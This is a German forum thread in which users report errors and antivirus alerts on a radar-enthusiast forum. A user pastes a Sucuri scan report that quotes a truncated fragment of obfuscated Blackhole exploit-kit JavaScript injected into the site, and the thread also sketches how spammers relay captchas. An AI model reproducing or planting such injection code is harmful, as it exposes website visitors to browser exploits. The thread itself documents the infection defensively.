Radarforum Defekt

[DerDicke 11]

War denn hier irgendwas defekt heute? Man macht sich drüben schon Sorgen. http://www.smilies.4-user.de/include/Denken/smilie_denk_24.gif

[QTreiberin 807]

Also ich hab den ganzen Tag nix ungewöhnliches bemerkt...

[Gast225 666]

Mit dem Inetexplorer kommt am oberen Rand eine Fehlermeldung. Allerdings kann man das Forum dennoch nutzen.

 

Warning: Cannot modify header information - headers already sent by (output started at /kunden/266146_22047/www.radarforum.de/httpdocs/forum/index.php(1) : eval()'d code:6) in /kunden/266146_22047/www.radarforum.de/httpdocs/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 114

 

Warning: Cannot modify header information - headers already sent by (output started at /kunden/266146_22047/www.radarforum.de/httpdocs/forum/index.php(1) : eval()'d code:6) in /kunden/266146_22047/www.radarforum.de/httpdocs/forum/admin/sources/classes/output/formats/html/htmlOutput.php on line 127

Edited November 9, 2012 by Gast225

[Prickelpitt 146]

Nicht das Forum ist defekt, sondern der Internetexplodierer

[Zöllner 412]

Genau das gleiche ist mir heute auch passiert. Internet-Explorer Version 8

[QTreiberin 807]

Tja, warum schätze ich bloß den Feuerfuchs so sehr.... und Linux als Betriebssystem.

[VPKurier 4]

Isch abe kein Internetexplorer Dingsda.

Und bei mir kam eine Virusalarmmeldung.

[QTreiberin 807]

Haste mal einen Virenscanner drüberlaufen lassen?

[Toxic Waste 329]

Ist bei mir auch mit Firefox aufgetreten hier daheim gerade eben und heute sporadisch auch im Labor. Bei Windows und Unix. Andere Brausen habe ich nicht probiert.

[Bonsai-Brummi 22]

Mit dem Inetexplorer kommt am oberen Rand eine Fehlermeldung.

 

Die hatte ich heute gestern früh schonmal - und gerade eben wieder; unter FF

[Ichtyos 20]

Letzteres: Dito!

[KlausK 182]

Bei mir auch, IE9 64-bit, andere Foren funktionieren.

[Gast225 666]

Unter FF habe ich keine Probleme.

 

Me kümmert sich heute darum.

[me 3]

Ich kann den Fehler reproduzieren, habe aber noch keine Lösung. Das Sicherheitsupdate habe ich bereits eingespielt. Ich vermute es sind Reste von einem Einbruchsversuch. Werde spätestens am Montag ein Update auf eine neuere Version machen.

[me 3]

Habe den Fehler gefunden und behoben.

[Eribaer 382]

Habe den Fehler gefunden und behoben.

 

@me: Herzlichen Dank für Deine rasche Unterstützung!LG!EribärEdit: Formatierung geändert

[QTreiberin 807]

Super, danke @me!

[KlausK 182]

Danke, funktioniert wieder.

[zorro69 443]

Wer will denn ins Radarforum "einbrechen"? war das ein DDos Angriff, oder was hat man versucht?

[me 3]

Das sind Bots die Foren auf Schwachstellen automatisiert untersuchen und Schadcode unterschieben. Da unser Admin Bereich gesondert geschützt ist, klappte der Einbruch nur zu 50%.

[HarryB 732]

Die Spambots greifen auch wieder vermehrt an, kann man da nicht auch was machen? Uebrigens scheint mir hier im Antwortfenster auch einiges veraendert, die Smileys z. Bsp. werden nicht mehr offeriert, eigentlich gar keine Formatierung......

[QTreiberin 807]

die Smileys z. Bsp. werden nicht mehr offeriert, eigentlich gar keine Formatierung......

Versuch mal den Button ganz oben links im Antwortfeld... dann müsste es wieder gehen (hatte ich auch schon ein- oder zweimal).

[Eribaer 382]

@QTreiberin: welchen Button ganz links im Antwortfeld? Bei mir hat sich auch die Schrift verändert und die Formatierung funktioniert auch nicht so, wie es sollte.

 

LG!

 

Eribär

[QTreiberin 807]

Wenn Du unten das Antwortfeld anklickst kommen doch ganz viele Buttons. Wenn Du ganz oben links die Maus über den Button (der über dem "B" für Fettschrift) hältst erscheint "Bearbeitungsmodus ändern". Den anklicken und die anderen Buttons sind nicht mehr grau unterlegt und funktionieren wieder.

[Eribaer 382]

Danke! Bei Kugel Chrome funktioniert es, beim IE Vers. 9 nicht. Seltsam.....

 

LG!

Eribär

[zorro69 443]

@me: und was soll der schadcode, den die bots dem forum unterschieben wollen tun? als neuer client im bot agieren?

[rponline 20]

Test1:

 

Absatz1

foo

 

 

Absatz2

foo2

 

 

 

Mit Iceweasel auf Debian Linux keine Probleme.

[rponline 20]

Danke! Bei Kugel Chrome funktioniert es, beim IE Vers. 9 nicht. Seltsam.....

 

LG!

Eribär

 

Versuch mal mit F12 einen anderen IE-Modus bzw. Seitenstandard.

[zorro69 443]

:.120.: der Smiley 120 geht nicht... mit firefox editiert...

[DerDicke 11]

[QTreiberin 807]

der Smiley 120 geht nicht...

Doch...

 

:120:

[zorro69 443]

[rponline 20]

Die Spambots greifen auch wieder vermehrt an, kann man da nicht auch was machen?

 

Wie schlimm ist es denn?

 

Ja, man da was machen. Eine Schwachstelle dieses Forums ist die Gültigkeitsdauer des auf der Registrierungseite verwendeten Captchas.

 

Spammer leiten das Bild des "Sicherheitscodes" um auf eine eigene Seite. Dort können Besucher z.B. Bilder für Erwachsene gratis anschauen. Um die Seite zu betreten, muss der Besucher das Captcha (z.B. des Radarforums) lösen. Für einen Menschen kein Problem. Mit diesen Information kann der Spammerbot einen neuen Account anlegen und Beiträge automatisiert erstellen. Es soll auch Menschen geben, die mit dem Lösen von Captchas Geld verdienen und einene entsprechenden Service anbieten.

 

 

Das Captcha sollte nur für eine kuze Zeit gültig sein !!!

Eine Reload der Reg.Seite nach 1 min wäre z.B. eine billige Lösung, wenn auch sehr unschön.

[Prickelpitt 146]

Es gibt Bilder nur für Erwachsene?

 

[QTreiberin 807]

Waren hier vor kurzem sogar mal gepostet... mit einer "Einladung" an alle RF-User sich über einen Link davon noch mehr anzugucken...

 

Das Problem war nur, manche "Mitwirkenden" auf den Bildern sahen noch nicht volljährig aus...

[me 3]

Ich habe den Cache neu erstellt, evtl. ging da etwas schief. Die Bots manipulieren Webseiten um Trojaner zu verteilen. Besonders der IE ist dafür anfällig.

 

Die Spammer verschwinden, wenn sie keinen Erfolg haben. Sollte das bis Ende der Woche so bleiben, schau ich, was man tun kann.

[Eribaer 382]

Vielleicht kann mir jemand helfen? Verwende den IE9 und habe alles (Unmögliche) versucht, auch den Hinweis von @rponline (Danke trotzdem!).

 

Sehe überhaupt keine Smileys und meine Signatur ist auch nicht mehr da, obwohl in der Profilverwaltung aktiviert.

 

Danke im Voraus und LG!

 

Eribär Edit: die Signatur ist wieder da, aber wo sind die Smileys? und irgendwie klappt die Formatierung auch nicht...

[QTreiberin 807]

Vielleicht kann mir jemand helfen?

Hast Du mal Deinen Cache geleert und alle Cookies gelöscht?

 

 

Wenn ja und es funktioniert trotzdem (noch) nicht.... nimm den Feuerfuchs...

[zorro69 443]

ich hab den IE 8 mal entstaubt und gestartet.. und was sage ich.. ich sehe die smileys der anderen, kann aber selbst keine eingeben *jammer*

[QTreiberin 807]

nimm den Feuerfuchs...

[zorro69 443]

mach ich doch,, es war nur ein test mit dem IE...

[rponline 20]

Es gibt Bilder nur für Erwachsene?

 

 

 

Und das sogar kostenlos, wenn auch manchmal nicht ganz umsonst.

[sharknbake 61]

Hast Du mal Deinen Cache geleert und alle Cookies gelöscht?

 

Ich habe den Cache geraucht und die Cookies gegessen,

Hat nix geholfen.

Vielleicht bringt mich das captcha weiter. Bezugsquellen ?

Ernsthaft: Ich hatte einen heftigen Intruderversuch auf meinen PC (Festplatte), als ich mich vorhin hier eingeloggt habe.

So habe ich die Norton Software noch nie rumflippen gesehen (Warnmeldungen).

Die Quelladresse war die IP des Forums.

Hatte mich dann ausgeloggt und wieder eingeloggt. Keine Probleme.

 

Gruss

snb

[QTreiberin 807]

Ich habe den Cache geraucht und die Cookies gegessen,

Oh oh, wenn das man nicht Werte ergibt die Dich im schlimmsten Fall zu einer MPU zwingen...

Du solltest vorsichtshalber jetzt 72 Stunden sämtliche Körperteile vom PC lassen um wieder ganz clean zu werden...

[rponline 20]

Securi SiteCheck (http://sitecheck.sucuri.net/) warnt derzeit vor radarforum.de

 

@all: Bitte vorübergehend Javascript deaktivieren oder diese Site nicht mehr ansurfen, bis das geklärt ist!

 

 

Free Website Malware ScannerSucuri SiteCheck Home

 

 

 

• Sitecheck Results
  
• Website details
  
• Blacklisting status
  

 

 

 

http://sitecheck.sucuri.net/images/warn2.png

web site: www.radarforum.de status: Site with warnings web trust: Not Blacklisted *This site was just scanned a few minutes ago.

 

Malware found on javascript file:

http://www.radarforum.de/forum/public/min/index.php?ipbv=35d5fd6b97fd186ba9889451654b8f4a&g=js

 

 

 

Known javascript malware.

Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v36

<script>try{if(window.document)window["document"]["body"]="123"}catch(bawetawe){if(window.document){v=window;try{fawbe--}catch(afnwenew){try{(v+v)()}catch(gngrthn){try{if(020===0x10)v["document"]["bo"+"dy"]="123"}catch(gfdnfdgber){m=123;if((alert+"").indexOf("na"+"ti"+"ve")!==-1)ev=window["eval"];}}

Malware found on javascript file:

http://www.radarforum.de/forum/public/min/index.php?ipbv=35d5fd6b97fd186ba9889451654b8f4a&charset=iso-8859-1&f=public/js/ipb.js,cache/lang_cache/2/ipb.lang.js,public/js/ips.hovercard.js,public/js/ips.quickpm.js,public/js/ips.board.js

 

We recommend you take immediate action to get your security issues remediated. Check out our service plans.

These scan results may be cached. Go ahead and rescan, it never hurts!

 

Scan Another Site

 

Enter a URL and the Sucuri SiteCheck scanner will check the site for malware, blacklisting status, and out-of-date software.

Disclaimer: Sucuri SiteCheck is a free & remote scanner. Although we do our best to provide the best results, 100% accuracy is not realistic, and not guaranteed.

 

Sucuri Plans

 

 

Popular

Power

 

 

5 Websites

$189.99 Yearly

Includes

• Malware Cleanup (No page limit)
  
• Website Integrity Monitoring
  
• Email & Twitter Alerting
  
• Manual Website Scanning
  
• Blacklist Removal
  

Get Clean

 

Premium

 

 

1 Website

$89.99 Yearly

Includes

• Malware Cleanup (No page limit)
  
• Website Integrity Monitoring
  
• Email & Twitter Alerting
  
• Manual Website Scanning
  
• Blacklist Removal
  

Get Clean

 

Need more? Check out more plans. Copyright © 2012, Sucuri LLC. All rights reserved.

Terms of Service | Privacy Policy Questions? 888.873.0817

[rponline 20]

An encoded javascript (or a redirection to it) was detected, leading browsers to the Blackhole Exploit kit (v1.x). It attempts to exploit the browser of anyone visiting the site using a combination of multiple vulnerabilities (Java, Adobe PDF, Flash and others). This is one of the most common type of malware we are seeing on web sites lately (2012/Mar).

Note that any PHP, JS or .htaccess could be compromised by this type of malware.

 

 

Quelle:

Securi Malware Labs

http://labs.sucuri.net/

[QTreiberin 807]

Also Computer-Englisch kann ich leider nicht...

[rponline 20]

Kurz gesagt: Die Website ist infiziert und es wird über Browsersicherheitslücken versucht schadhaften Code auf deinem Computer auszuführen.

[QTreiberin 807]

Gilt das auch für Linux?

[rponline 20]

Ja, natürlich. Wenn nicht per Live-CD gebootet.

Jedoch ist der Internet Explorer resp. Windows besonders gefährdet.